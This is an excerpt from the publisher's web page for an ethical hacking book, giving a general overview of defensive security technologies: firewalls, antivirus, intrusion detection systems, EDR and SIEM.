Search icon CANCEL
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Conferences
Free Learning
Arrow right icon
Arrow up icon
GO TO TOP
Hands-On Ethical Hacking Tactics

You're reading from   Hands-On Ethical Hacking Tactics Strategies, tools, and techniques for effective cyber defense

Arrow left icon
Product type Paperback
Published in May 2024
Publisher Packt
ISBN-13 9781801810081
Length 464 pages
Edition 1st Edition
Arrow right icon
Author (1):
Arrow left icon
Shane Hartman Shane Hartman
Author Profile Icon Shane Hartman
Shane Hartman
Arrow right icon
View More author details
Toc

Table of Contents (20) Chapters Close

Preface 1. Part 1:Information Gathering and Reconnaissance
2. Chapter 1: Ethical Hacking Concepts FREE CHAPTER 3. Chapter 2: Ethical Hacking Footprinting and Reconnaissance 4. Chapter 3: Ethical Hacking Scanning and Enumeration 5. Chapter 4: Ethical Hacking Vulnerability Assessments and Threat Modeling 6. Part 2:Hacking Tools and Techniques
7. Chapter 5: Hacking the Windows Operating System 8. Chapter 6: Hacking the Linux Operating System 9. Chapter 7: Ethical Hacking of Web Servers 10. Chapter 8: Hacking Databases 11. Chapter 9: Ethical Hacking Protocol Review 12. Chapter 10: Ethical Hacking for Malware Analysis 13. Part 3:Defense, Social Engineering, IoT, and Cloud
14. Chapter 11: Incident Response and Threat Hunting 15. Chapter 12: Social Engineering 16. Chapter 13: Ethical Hacking of the Internet of Things 17. Chapter 14: Ethical Hacking in the Cloud 18. Index 19. Other Books You May Enjoy

Defensive technologies

Defensive technologies include software and devices used to thwart attackers. Some of these technologies are passive, presenting detections and alerts requiring intervention by any analyst. Other technologies are active, using workflows or rules to determine actions to take and act upon them. Antivirus software is an example of an active technology that acts upon a detection and then processes a rule. In this case, it would either be quarantine or delete. The following is a brief list of defensive technologies defenders can employ in the networks they are tasked to protect:

  • Firewalls: Often considered the first line of defense, firewalls, like other security technologies, have advanced over the years. They originally started as just smart routers with access control lists (ACLs) on them. Later, they developed the ability to track and maintain state. The latest iteration, the next-generation firewall, goes beyond the previous two generations and incorporates the ability to look at and understand application behavior and apply intrusion prevention.
  • Antivirus (AV) software: Just like firewalls, this was one of the first technologies to be developed to combat viruses. It, too, has gone through several enhancements over the years. In the beginning, antivirus was simply a set of signature-based rules that, once matched, the system was alerted and could even delete the malicious file(s) for you. As the industry matured, later generations began incorporating heuristic detection and the inspection of applications such as browsers, and merged with larger suites of products to perform multiple security operations. The latest generation has taken the previous lessons and not only applied them but added behavior detection for application and user interactions.
  • Intrusion detection system (IDS): Intrusion detection systems in this category fall into two classifications. The first is network intrusion detection systems (NIDSs). In this configuration, a device or system is put into place that monitors the network traffic and applies a set of detection rules. Some NIDSs can also interact with network traffic. When this option is implemented, it is referred to as an intrusion prevention system or IPS. The second type is host intrusion detection system (HIDS), and unlike NIDS, these operate at the file system level on the monitored machines. HIDS, just like NIDS, have their limitations in that they only really look at one, or possibly two, elements of activity during transactions between machines. They are still widely implemented; however, other superior technologies such as next-gen firewalls and EDR systems have largely supplanted this category of security systems.
  • Endpoint detection and response (EDR): EDR systems are some of the latest security tools to be introduced to enterprise security. This technology exists at the endpoint, be it a server or a workstation as an agent install. This agent collects and reports to a central repository where data is recorded and processed, applying and creating behavior profiles for applications and users alike. This can then be used to discover malicious behavior through alerts or hunting.
  • Security information and event management (SIEM): SIEM can be described as the go-between for network detection and EDR systems. What SIEMs do is collect data from across the network, including logs, telemetry, and device information, to give a more holistic view of the enterprise. One example of the insight a SIEM brings would be if an attacker has gained access to a network and begins downloading tools and performing malicious activities. These activities would be detected by the SIEM based on rules and behaviors, leading to an alert to the appropriate security staff.

Now, to begin your journey into ethical hacking, let’s start by creating a lab environment in which we can test and explore.

You have been reading a chapter from
Hands-On Ethical Hacking Tactics
Published in: May 2024
Publisher: Packt
ISBN-13: 9781801810081
Register for a free Packt account to unlock a world of extra content!
A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.
Unlock this book and the full library FREE for 7 days
Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of
Renews at ₹800/month. Cancel anytime